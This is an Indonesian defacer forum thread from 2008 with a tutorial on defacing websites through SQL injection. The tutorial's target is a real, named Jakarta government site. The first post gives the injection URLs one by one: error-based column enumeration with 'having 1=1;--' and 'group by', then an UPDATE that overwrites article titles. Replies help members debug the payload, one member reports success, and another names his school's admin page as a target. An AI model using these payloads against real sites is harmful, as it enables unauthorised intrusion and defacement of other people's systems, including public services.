Komunitas Defacer Indonesia


 

IndeksPortalFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Deface dengan SQL Injection

Topik sebelumnya Topik selanjutnya Go down 
PengirimMessage
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Deface dengan SQL Injection   Sat May 31, 2008 1:53 am

Halo… teman2!! Ketemu lagi dengan makhluk tuhan yang paling ganteng -.-” hehehe kek lagu aja yah…
yaudah gak papa kek lagu… yang penting gw tetap ganteng Razz

Tutorial kali ini adalah deface melalui url dengan menggunakan sql injection… hhmm… untuk tutor kali ini kita (loe aja kali!!) akan menggunakan sebuah web untuk percobaan…

Webnya adalah…

http://pemakaman.jakarta.go.id/
hehehe… web pemerintah… gak papa kok Razz yang perlu kita lakukan pertama adalah membuka salah satu link artikelnya, contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102

untuk mengetahui apakah web tersebut terkena bugs sql injection… kita akan menambahkan satu karakter ‘ setelah kode artikel… contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′

Oooopppsss keknya terjadi error….

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Unclosed quotation mark before the character string ‘102′ order by creationdate DESC’.

/artikel.asp, line 230

berarti bisa dipastikan klo website tersebut terkena bugs…
oke… ayo kita buat error lagi, sampe orgasme… loh!? Razz
kali ini kita membuat error dengan : having 1=1;–
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ having 1=1;–

errornya seperti ini :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.naskah_id’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/artikel.asp, line 230

py_Naskah.naskah_id ini adalah nama tabel dan kolom database
py_Naskah => nama tabel
naskah_id => nama kolom

sekarang kita cari tau tabel berikutnya…
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.naskah_id having 1=1;–

error lagi Razz :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.category’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

sekarang kita dapat py_Naskah.category
berarti kitambah di urlnya
contoh : http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id having 1=1;–

error berikutnya :

Microsoft OLE DB Provider for SQL Server error ‘80040e14′

Column ‘py_Naskah.Publish’ is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

/artikel.asp, line 230

urlnya menjadi :
http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ group by py_Naskah.category,py_Naskah.naskah_id,py_Naskah.Publish having 1=1;–

nah kita udah dapat nama kolom judulnya yaitu : py_Naskah.title

untuk merubahnya kita menggunakan cara berikut :

http://pemakaman.jakarta.go.id/artikel.asp?naskah_id=102′ update py_Naskah set title=’Hacked by me’;–

Hasilnya

Oke that’s all

Good Luck Wink

http://bl4ckb0t.co.cc/

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: Deface dengan SQL Injection   Sat May 31, 2008 2:35 am

Very Happy wew kayakna mantaf neehh

ciba ahhkk lol!

_________________
Kembali Ke Atas Go down
Lihat profil user
cr4wl3r
I'am Not Hacker
I'am Not Hacker


Jumlah posting : 373
Join date : 18.04.08
Age : 30
Lokasi : In Your Mind

PostSubyek: Re: Deface dengan SQL Injection   Sun Jun 01, 2008 12:35 am

bl4ck gitu loch Razz
Kembali Ke Atas Go down
Lihat profil user http://gorontalodefacer.forumandco.com
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: Deface dengan SQL Injection   Sun Jun 01, 2008 5:46 am

hehehe...

iya kali Very Happy

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
Uzuma_dOnezA
Script Kiddies
Script Kiddies


Jumlah posting : 111
Join date : 10.05.08
Age : 25
Lokasi : vallembank

PostSubyek: Re: Deface dengan SQL Injection   Wed Jun 04, 2008 3:19 am

buseeeeeeet

anak syapa niy orang lol! lol! lol! lol!

_________________

http://friendsterelite.co.cc
Kembali Ke Atas Go down
Lihat profil user http://friendsterelite.co.cc
cYb3r_jOk3
Script Kiddies
Script Kiddies


Jumlah posting : 232
Join date : 12.05.08
Age : 28
Lokasi : mAlaNk jAWatiMUr

PostSubyek: Re: Deface dengan SQL Injection   Wed Jun 04, 2008 3:31 am

wedew kejem banget bang yang atu ini yah ampek web pemakan ja di deface..... affraid affraid affraid

ampun kk......... Evil or Very Mad Evil or Very Mad Evil or Very Mad
Kembali Ke Atas Go down
Lihat profil user http://baeimlicious.blogspot.com
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: Deface dengan SQL Injection   Sun Jun 29, 2008 11:35 am

malas buat tutornya

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
himoe
Script Kiddies
Script Kiddies


Jumlah posting : 133
Join date : 10.06.08
Lokasi : Soo Low

PostSubyek: Re: Deface dengan SQL Injection   Mon Jul 07, 2008 6:31 pm

kLo diTamBah karaKter Lagi TaPi gaK errOrz gMn DeFaCe Nya??

Question Question Question Question
Kembali Ke Atas Go down
Lihat profil user http://www.friendster.com/himoe
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: Deface dengan SQL Injection   Thu Jul 10, 2008 9:32 pm

maksudnya apa yah?
maklum ganteng2 tapi newbie gak sama ama ascii yang master heker

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
himoe
Script Kiddies
Script Kiddies


Jumlah posting : 133
Join date : 10.06.08
Lokasi : Soo Low

PostSubyek: Re: Deface dengan SQL Injection   Fri Jul 11, 2008 5:57 pm

bL4Ck_3n91n3 wrote:
maksudnya apa yah?
maklum ganteng2 tapi newbie gak sama ama ascii yang master heker

aBaNg Bisa Ja nTu...

TuTorial YaNg da DI aTaS no Kudu di KasiH tanda '

DeFace yang gak pke taNda '

gMna aTu aBaNG ??

kYa Ni weB puNya sCuL q siCh

http://sman1-prob.sch.id


HalaMan aDminNya Beda atu BaNG

http://sman1-prob.sch.id/admin.php
Kembali Ke Atas Go down
Lihat profil user http://www.friendster.com/himoe
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: Deface dengan SQL Injection   Fri Jul 11, 2008 8:10 pm

yang atas ntu kan cuman buat database yang pake software iis lain lagi klo yang pake sopwer mysql

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
himoe
Script Kiddies
Script Kiddies


Jumlah posting : 133
Join date : 10.06.08
Lokasi : Soo Low

PostSubyek: Re: Deface dengan SQL Injection   Sat Jul 12, 2008 11:12 am

bL4Ck_3n91n3 wrote:
yang atas ntu kan cuman buat database yang pake software iis lain lagi klo yang pake sopwer mysql

MaKaciii Yaaa BaNg......


bRu Tw aQ


masiH nYuBi NicH..........
Kembali Ke Atas Go down
Lihat profil user http://www.friendster.com/himoe
MaDOnk
Newbie
Newbie


Jumlah posting : 35
Join date : 09.07.08

PostSubyek: Re: Deface dengan SQL Injection   Mon Jul 14, 2008 4:13 pm

kk belack emang kenyen

/me brb belajar study lagi
Kembali Ke Atas Go down
Lihat profil user http://gang11.co.cc
CYB3R_TR0N
Script Kiddies
Script Kiddies


Jumlah posting : 133
Join date : 25.05.08
Age : 23
Lokasi : Makam Selatan

PostSubyek: Re: Deface dengan SQL Injection   Sun Jul 20, 2008 6:57 am

Sad Sad

Ajarin donk kaka .
Kembali Ke Atas Go down
Lihat profil user
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: Deface dengan SQL Injection   Sun Jul 20, 2008 7:07 am

CYB3R_TR0N wrote:
Sad Sad

Ajarin donk kaka .

lewat ym atau irc

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
tukulesto
Developt Kiddie
Developt Kiddie


Jumlah posting : 581
Join date : 17.05.08
Age : 30
Lokasi : dimana ada kamu, aku pasti ada

PostSubyek: Re: Deface dengan SQL Injection   Sun Jul 20, 2008 1:42 pm

misi ommm...

numpang belajar study study study

_________________
Something's getting in the way
Something's just about to break
I will try to find my place at this fucking world


FRIENDSTER | SHL | IDC

Webnya orang cupu


Kembali Ke Atas Go down
Lihat profil user http://www.tukulesto.co.cc
Mr.C
Admin
Admin


Jumlah posting : 37
Join date : 13.05.08

PostSubyek: Re: Deface dengan SQL Injection   Thu Aug 14, 2008 6:19 am

kacian... udah mati.. tapi masih di umbat para hacker...

btw.. bro tadi gw coba.. tapi udah gak jadi di site itu...

ada site lainnya gak?
Kembali Ke Atas Go down
Lihat profil user
massmissile
Newbie
Newbie


Jumlah posting : 29
Join date : 01.08.08
Age : 31
Lokasi : Command Center

PostSubyek: Re: Deface dengan SQL Injection   Thu Aug 14, 2008 1:22 pm

bL4Ck_3n91n3 wrote:
CYB3R_TR0N wrote:
Sad Sad

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4
Kembali Ke Atas Go down
Lihat profil user
bL4Ck_3n91n3
MotherFucker!?
MotherFucker!?


Jumlah posting : 568
Join date : 18.04.08

PostSubyek: Re: Deface dengan SQL Injection   Thu Aug 14, 2008 6:43 pm

massmissile wrote:
bL4Ck_3n91n3 wrote:
CYB3R_TR0N wrote:
Sad Sad

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4

kau aja yang dodol

harusnya ntu having 1=1;--
perhatikan baik2 apa bedanya
loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua
halah

_________________
What da fuck!!! are u looking for!?
Kembali Ke Atas Go down
Lihat profil user http://bl4ckb0t.co.cc
massmissile
Newbie
Newbie


Jumlah posting : 29
Join date : 01.08.08
Age : 31
Lokasi : Command Center

PostSubyek: Re: Deface dengan SQL Injection   Fri Aug 15, 2008 2:32 am

bL4Ck_3n91n3 wrote:
massmissile wrote:
bL4Ck_3n91n3 wrote:
CYB3R_TR0N wrote:
Sad Sad

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4

kau aja yang dodol

harusnya ntu having 1=1;--
perhatikan baik2 apa bedanya
loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua
halah

Ya mav klo salah..hehehehe...Ok deh kaka..kita coba lg ampe bisa...klo ga bisa ya coba trus sampe bisa...oya btw kaka punya YM ga??jd klo nanya lagi biar sip...thx berat brother...
Kembali Ke Atas Go down
Lihat profil user
massmissile
Newbie
Newbie


Jumlah posting : 29
Join date : 01.08.08
Age : 31
Lokasi : Command Center

PostSubyek: Re: Deface dengan SQL Injection   Fri Aug 15, 2008 2:56 am

bL4Ck_3n91n3 wrote:
massmissile wrote:
bL4Ck_3n91n3 wrote:
CYB3R_TR0N wrote:
Sad Sad

Ajarin donk kaka .

lewat ym atau irc

Ka, ko abis ditambahin having 1=1 ;- errornya beda ya, jadi gini nih..

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near '�'.

/artikel.asp, line 230

Tu kenapa tuh??Mohon jawabannya n mav tlat nyoba...Thx b4

kau aja yang dodol

harusnya ntu having 1=1;--
perhatikan baik2 apa bedanya
loe pake spasi sedangkan gw kagak trus loe pake tanda - cuman satu sedangkan gw dua
halah

BERHASIL JURAGAAAAAANNNNNN BLACK....GIVE ME MORE KNOWLEDGE...

Btw ka black, web yang pake IIS tu yang belakangnya ini bukan..
.aspx
.ascx
.htm
.asmx
.....n masih banyak lg (ane liat di Microsoft ASP.NET Web Matrix...)
Mav klo salah...

Thx berat atas jawabannya...
Kembali Ke Atas Go down
Lihat profil user
CYB3R_TR0N
Script Kiddies
Script Kiddies


Jumlah posting : 133
Join date : 25.05.08
Age : 23
Lokasi : Makam Selatan

PostSubyek: Re: Deface dengan SQL Injection   Fri Aug 15, 2008 9:29 am

Crying or Very sad

okok deeh kaka .

aku tunguu iia .

lol!
Kembali Ke Atas Go down
Lihat profil user
omuth_stebreizh
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 21.05.08
Age : 28
Lokasi : malang

PostSubyek: Re: Deface dengan SQL Injection   Wed Sep 03, 2008 7:51 pm

weik...


blajar dulu ah..
masternya mau dateng.. study study study study study
Kembali Ke Atas Go down
Lihat profil user http://www.friendster.com/dangerbabyz
ascii
Admin
Admin


Jumlah posting : 379
Join date : 18.04.08

PostSubyek: Re: Deface dengan SQL Injection   Fri Sep 19, 2008 10:20 pm

@massmissile

daripada cari celah site lain..

coba dahulu aplikasi di localhost..

sekalian pengenalan jaringan ,server,database study
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: Deface dengan SQL Injection   Today at 10:47 pm

Kembali Ke Atas Go down
 
Deface dengan SQL Injection
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» (Ask) Ninja 250 Injection vs. Carbu
» bercanda dengan LOGIKA
» bedanya ninja 250 dengan ninja 250 se
» Injection Open Loop vs Close Loop
» HELP!!! beda MOTUL 5100 dengan MOTUL H-TECH

Permissions in this forum:Anda tidak dapat menjawab topik
::Gorontalo Defacer Community:: :: General Topic :: Tips and Trik-
Navigasi: